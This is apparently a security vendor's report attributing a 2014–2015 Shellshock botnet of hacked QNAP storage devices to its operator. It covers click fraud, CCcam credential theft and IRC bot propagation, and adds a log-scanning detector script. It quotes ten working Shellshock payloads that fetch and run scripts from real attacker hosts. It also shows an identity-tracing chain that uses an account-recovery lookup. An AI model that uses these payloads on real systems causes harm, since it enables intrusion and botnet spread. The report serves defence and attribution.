Tracking a ShellShock Click Fraud Botnet

How Forkbombus Labs identified the actor of a 2,500 strong click fraud botnet

On June 18th, 2016, Fabio Gasperini, an Italian national, was arrested in Amsterdam, Netherlands, at the request of the United States Department of Justice, accused of creating a global botnet of hacked QNAP Network Attached Storage devices with the ultimate motivation of performing advertisement click fraud. In a trial which concluded on August 4th, 2017, Fabio Gasperini was found guilty of computer intrusion. This trial is the conclusion of an investigation which first began in December of 2014.

In this report we cover how Forkbombus Labs' learned dynamic deception technology, Hivemind, first discovered the alleged activity, how we identified the motivation of click fraud behind these attacks, and the ultimate discovery of the botmaster, Fabio Gasperini.

The Initial Exploitation Activity

On December 5th, 2014, Hivemind alerted our analysts to new Shellshock (CVE-2014-6271) exploitation activity originating from a QNAP Network Attached Storage device located in Spain (Figure 1).

Figure 1. Initial botnet exploitation event observed by Hivemind

Exploited QNAP devices were then instructed to download and execute a bash script from one of numerous identified sources. Over the course of our investigation, we've identified 10 distinct Shellshock payloads related to the botnet (Figure 2).

Payload 1 (count: 2,511; first seen: 2014-12-06 02:13:41 EST; last seen: 2015-03-13 14:54:54 EST)
    () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1

Payload 2 (count: 600; first seen: 2014-12-05 10:15:04 EST; last seen: 2015-03-13 11:01:29 EST)
    () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1

Payload 3 (count: 286; first seen: 2014-12-17 17:18:20 EST; last seen: 2015-03-12 17:23:38 EST)
    () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh 0<&1 2>&1

Payload 4 (count: 125; first seen: 2014-12-07 09:12:31 EST; last seen: 2015-03-07 18:27:28 EST)
    () { :; }; /bin/rm -rf /tmp/S0.php /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://x3q.altervista.org/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh && sh S0.php 0<&1 2>&1 &

Payload 5 (count: 95; first seen: 2014-12-28 04:35:02 EST; last seen: 2015-03-05 05:33:55 EST)
    () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://stanislaw.altervista.org/io.php 0<&1 2>&1

Payload 6 (count: 77; first seen: 2014-12-14 02:09:00 EST; last seen: 2015-02-04 21:47:37 EST)
    () { :; }; /bin/rm -rf /tmp/io.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://nyo2k2.altervista.org/io.php -P /tmp && /bin/rm /tmp/io.php 0<&1 2>&1

Payload 7 (count: 40; first seen: 2015-01-06 13:17:16 EST; last seen: 2015-03-09 02:32:43 EST)
    () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

Payload 8 (count: 5; first seen: 2014-12-18 09:48:53 EST; last seen: 2015-02-02 22:03:24 EST)
    () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -P /tmp && /bin/sh /tmp/S0.php 0<&1 2>&1

Payload 9 (count: 1; first seen: 2014-12-08 14:03:00 EST; last seen: 2014-12-08 14:03:00 EST)
    () { :; }; rm -rf S00.sh && /usr/bin/wget -c http://185.14.30.79/S00.sh && /bin/sh S00.sh && echo ok 0<&1 2>&1

Payload 10 (count: 1; first seen: 2014-12-22 18:56:43 EST; last seen: 2014-12-22 18:56:43 EST)
    () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh 0<&1 2>&1

Figure 2. Table highlighting the details of observed shellshock payloads

These Shellshock payloads instructed the victims to download files from 8 distinct URLs:

  • http://qupn.byethost5.com/gH/S0.sh
  • http://185.14.30.79/S0.sh
  • http://x3q.altervista.org/gH/S0.php
  • http://185.14.30.79/S00.sh
  • http://nyo2k2.altervista.org/io.php
  • http://192.192.78.216:9090/gH/S0.php
  • http://stanislaw.altervista.org/io.php
  • http://lliillii.altervista.org/io.php

With the exception of URLs ending in io.php, these files configured the QNAP devices to download further resources, join the botnet, and engage in further worm-type propagation. These S0 scripts additionally served several other purposes (Figures 3 through 8).
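The following Python is an added example, not code from the original report or from Hivemind: it scans constructed sensor records in an assumed "<timestamp> <src_ip> <header-name>: <header-value>" shape, flags header values carrying the CVE-2014-6271 trigger, and tallies the download URLs per payload with first/last seen timestamps, the way the Figure 2 table does. The record format, the source IPs and the shortened payload strings are all constructed for the example.

```python
import re

# CVE-2014-6271 trigger: an empty function body "() { ... };" in an
# environment-variable value, after which bash executes the trailing commands
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;(?P<cmds>.*)$")
# http(s) URLs that the injected commands hand to wget
URL_RE = re.compile(r"https?://[^\s\"']+")
# Assumed record shape: "<timestamp> <src_ip> <header-name>: <header-value>"
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<header>[^:]+): (?P<value>.*)$")

# Constructed sample records (documentation-range source IPs, payloads abridged from Figure 2)
SAMPLE_LOGS = [
    "2014-12-06T02:13:41 198.51.100.7 User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1",
    "2014-12-05T10:15:04 198.51.100.9 Referer: () { :; }; /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1",
    "2014-12-08T14:03:00 203.0.113.5 Cookie: () { :; }; rm -rf S00.sh && /usr/bin/wget -c http://185.14.30.79/S00.sh && /bin/sh S00.sh && echo ok 0<&1 2>&1",
    "2014-12-09T08:00:00 203.0.113.6 User-Agent: Mozilla/5.0 (X11; Linux x86_64)",  # benign request
    "2015-03-13T14:54:54 198.51.100.7 User-Agent: () { :; }; /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1",
]


def shellshock_payload(value):
    # Return the command tail of a Shellshock trigger, or None for a benign header value
    m = SHELLSHOCK_RE.search(value)
    return m.group("cmds").strip() if m else None


def payload_urls(cmds):
    # Every download target named in the injected command string
    return URL_RE.findall(cmds)


def summarize(lines):
    # Per-URL hit count, first/last seen timestamps and distinct sources (cf. Figure 2)
    stats = {}
    for line in lines:
        rec = LINE_RE.match(line)
        if not rec:
            continue  # record does not fit the assumed shape
        cmds = shellshock_payload(rec.group("value"))
        if cmds is None:
            continue  # not an exploitation attempt
        ts = rec.group("ts")
        for url in payload_urls(cmds):
            s = stats.setdefault(url, {"count": 0, "first": ts, "last": ts, "sources": set()})
            s["count"] += 1
            s["first"], s["last"] = min(s["first"], ts), max(s["last"], ts)
            s["sources"].add(rec.group("src"))
    return stats
```

Running summarize(SAMPLE_LOGS) yields three download URLs, with http://185.14.30.79/S0.sh seen twice from the same source and the benign User-Agent line ignored.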

Figure 3. Adding a backdoor administrator Linux user account

Figure 4. Creation of a publicly accessible unauthenticated webshell

Figure 5. Creating an SSH service running on port 26

Figure 6. Patching the QNAP NAS Device for the Shellshock vulnerability, preventing further exploitation

Figure 7. Downloading and execution of a Lightaidra IRC Bot binary of matching system architecture

Figure 8. Execution of pnscan configured to further spread the botnet

Lightaidra IRC Bot

Above, Figure 7 highlights the botnet's installation script downloading a Lightaidra IRC Bot binary and configuring the QNAP device to run the Lightaidra IRC Bot binary on startup. Examining this binary gives us some initial clues.

$ sha256sum ..32
fe18e7a49018ef331819bb8eae2961fa36ac099933d5a34a5f53c9c61b79e14c  ..32
$ md5sum ..32
dc2f1b4cb4a348c6f9abe598e72c486b  ..32

Hash values of the 32 bit Lightaidra IRC Bot Binary

Executing strings on the binary reveals the binary is configured to connect to an IRC server located at 192.79.153.207 over port 6667, and join the channel #aidra (Figure 9).

Figure 9. IRC Server configuration from the Lightaidra IRC Bot Binary

The string UPX! is also observed several times, indicating the file has been packed with the UPX packer. Attempting to use UPX to unpack the ..32 file proves successful.

$ upx-ucl -d ..32
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     48318 <-     21872   45.27%  netbsd/elf386  ..32

Unpacked 1 file.

Unpacking the ..32 Lightaidra IRC Bot Binary

The unpacked binary now reveals several strings of interest. The Lightaidra IRC Bot binary attempts to retrieve its public IP address by accessing http://ip.betfair2.eu/ip, located at the 178.79.183.247 address (Figure 10). Notably, the betfair2.eu domain appears to be a reference to the Betfair online casino.

Figure 10. Lightaidra IRC Bot Binary reaching out to ip.betfair2.eu to find its public IP address

185.14.30.79

The 185.14.30.79 host was observed in the most prolific Shellshock payload. Research on this host reveals it was leased from UAServers. A PTR record lookup for 185.14.30.79 returned the domain name gaspolo.uaservers.net (Figure 11). At the time, UAServers was known to register PTR records containing its clients' usernames for the hosts they leased, suggesting gaspolo is the username of the server's renter.

Figure 11. PTR record of the 185.14.30.79 host

185.14.30.79/S00.sh

In addition to the most prolific http://185.14.30.79/S0.sh script, another script (http://185.14.30.79/S00.sh) was observed a single time, on December 8th, 2014, originating from the residential Italian IP address 93.40.91.149. While largely performing the same activity highlighted above in Figures 3 through 8, this script also downloads two further resources, 23.231.6.11/emme and 23.231.6.11/cl (Figure 12).

Figure 12. Scripts unique to the 185.14.30.79/S00.sh script

23.231.6.11/cl

The http://23.231.6.11/cl file is another Bash shell script. Its purpose is to identify CCcam card sharing credentials and exfiltrate them to a script hosted at ppoolloo.altervista.org (Figure 13).

Figure 13. The 23.231.6.11/cl CCcam card sharing credential exfiltration script

23.231.6.11/emme

The http://23.231.6.11/emme file is another Bash shell script. Its purpose is to fraudulently view advertisements served by the JuiceADV advertisement service. This script reveals the user's JuiceADV numeric user ID, and also the domain name sempreinformato.eu, which is meant to serve as the HTTP referrer of the visited advertisements. Part of this script retrieves a random HTTP User-Agent string from a script located at http://178.79.183.247/agent.php (Figure 14).

Figure 14. An excerpt of 23.231.6.11/emme which fraudulently “views” advertisements

Notably, the 178.79.183.247 host is the same one used to retrieve a bot's public IP address, as detailed above in the Lightaidra IRC Bot section.

Sempreinformato.eu

The sempreinformato.eu domain name was observed as the referrer for advertisements which the botnet fraudulently viewed. "Sempre Informato" roughly translates from Italian to English as "Always Informed", supporting an Italian theme. The sempreinformato.eu site is reportedly registered to a user with the e-mail address gaspolo@gmail.com (Figure 15). Note that the gaspolo portion of this address matches the previously discovered subdomain from the gaspolo.uaservers.net host.

Figure 15. Whois information for sempreinformato.eu

93.40.91.149

The Italian host 93.40.91.149 was observed once by Hivemind on December 8th, 2014. According to an nmap scan performed on December 21st, the IP does not appear to host any services (Figure 16).

Figure 16. Nmap scan of the 93.40.91.149 host for common service ports

This host was observed scanning with the S00.sh propagation script, which, unlike the rest of the observed propagation scripts, contains references to a domain name registered to a citizen of Rome. These facts make it likely that the 93.40.91.149 host was in use by the attacker at the time of the attacks and is not itself a separate compromised host.

gaspolo@gmail.com Email Address

The Google account gaspolo@gmail.com was retrieved from the whois of the SempreInformato.eu website. The Gaspolo alias matches the subdomain retrieved from the PTR record of the heavily utilized 185.14.30.79 asset. Initiating a Google account recovery process for the gaspolo@gmail.com account reveals the owner is named "Fabio Gasperini" (Figure 17).

Figure 17. Google account recovery for gaspolo@gmail.com

Performing a Google search for gaspolo@gmail.com revealed several links, including several blogspot.com blogs Fabio has authored regarding video game hacking (particularly Facebook games such as "Pet Society"), in which he guides his readers on how to cheat and "hack" these games. The search also reveals mailing list posts from as early as 2005 regarding system administration.

Fabio “Gaspolo” Gasperini

Performing a Google search for “Fabio Gaspolo Gasperini” reveals a Facebook post from Fabio Gasperini on November 15th, 2009, in which he promotes his (now defunct) website gaspolo.it on a Facebook page titled “Pet Society tips, Tricks and Cheats” (Figure 18). Further, Fabio lists himself as living in Centocelle, Lazio, Italy, which is a section of Rome, Italy (Figure 19).

Figure 18. Fabio Gasperini’s Facebook page, listing his residence

Figure 19. Fabio Gasperini advertising his website gaspolo.it on Facebook

Tying It All Together

Through our research, we've been able to identify over 2,500 distinct hosts involved in this activity. The most prolific host used in the propagation of botnet resources, 185.14.30.79, gives us our first clue as to the botmaster's identity: the nickname Gaspolo. Analyzing the retrieved IRC bot binary reveals other related indicators, such as the 178.79.183.247 IP address. While monitoring for related activity, Hivemind was able to identify the lone S00.sh attempt, which offers direct insight into the attacker's advertisement fraud and card sharing credential theft motivations.

The advertisement fraud provides our first real glimpse of our attacker. It also gives the first indication that the party responsible for the infrastructure and propagation of the botnet is the same individual who is profiting from the advertisement fraud: Gaspolo. Exploring information related to the uncovered Gaspolo identities reveals his true identity as Fabio Gasperini, a citizen of Rome, Italy.

While the botnet was observed propagating in a worm fashion, the exploit attempt which most strongly leads to identifying the attacker as Fabio Gasperini originates from a residential Italian connection which did not present itself as a QNAP NAS (or any other particular) device. Furthermore, resources used in the advertisement fraud were also used in the IRC bot propagation. This shared resource is linked to betfair2.eu, potentially related to the European gambling website Betfair, which correlates with Bleeping Computer's later article describing Fabio's employment with an online gambling website.

Hivemind Intelligent Deception

Hivemind is Forkbombus Labs' patent pending A.I.-driven deception technology. Standard honeypots and deception technologies imitate a predetermined service or environment. This becomes problematic as attackers' capabilities and interests often differ from what static deceptions offer. Even when attackers stumble upon static honeypots, these technologies are often ignored by attackers who favor different scenarios. When attackers fail to engage with deception technologies, defenders fail to gain the valuable intelligence which enables intelligent responses to attacks.

As Hivemind learns an attacker's capabilities and motivations, Hivemind sensors instantly alter their appearance to each attacker to emulate what they are most likely to interact with. Hivemind ensures attackers are more likely to engage Hivemind sensors, leading attackers to divulge as much information about themselves and their intentions as possible. These enhanced collection capabilities enable defenders to rapidly detect attackers' resources, motivations, and identities, allowing defenders to respond to threats more quickly and more intelligently than ever before. Attackers that engage with Hivemind increase their costs while saving defenders time and money.

The information in this article is provided as is and without warranty and does not represent professional advice or services.
Forkbombus Labs is not responsible for any loss or damages from actions taken based on information within this publication.

In the interest of saving space and protecting non-suspect identities, some images may be redacted or cropped. Forkbombus Labs asserts that no provided evidence has been altered or misrepresented, and only non-contributing information has been redacted.

While all information represented in this document is believed to be accurate, Forkbombus Labs and any contributing entities are not responsible or liable for repercussions from the use or misuse of any information provided throughout this document, or in any resulting correspondence related to this document. Receiving parties are responsible for independently verifying the information outlined in this document.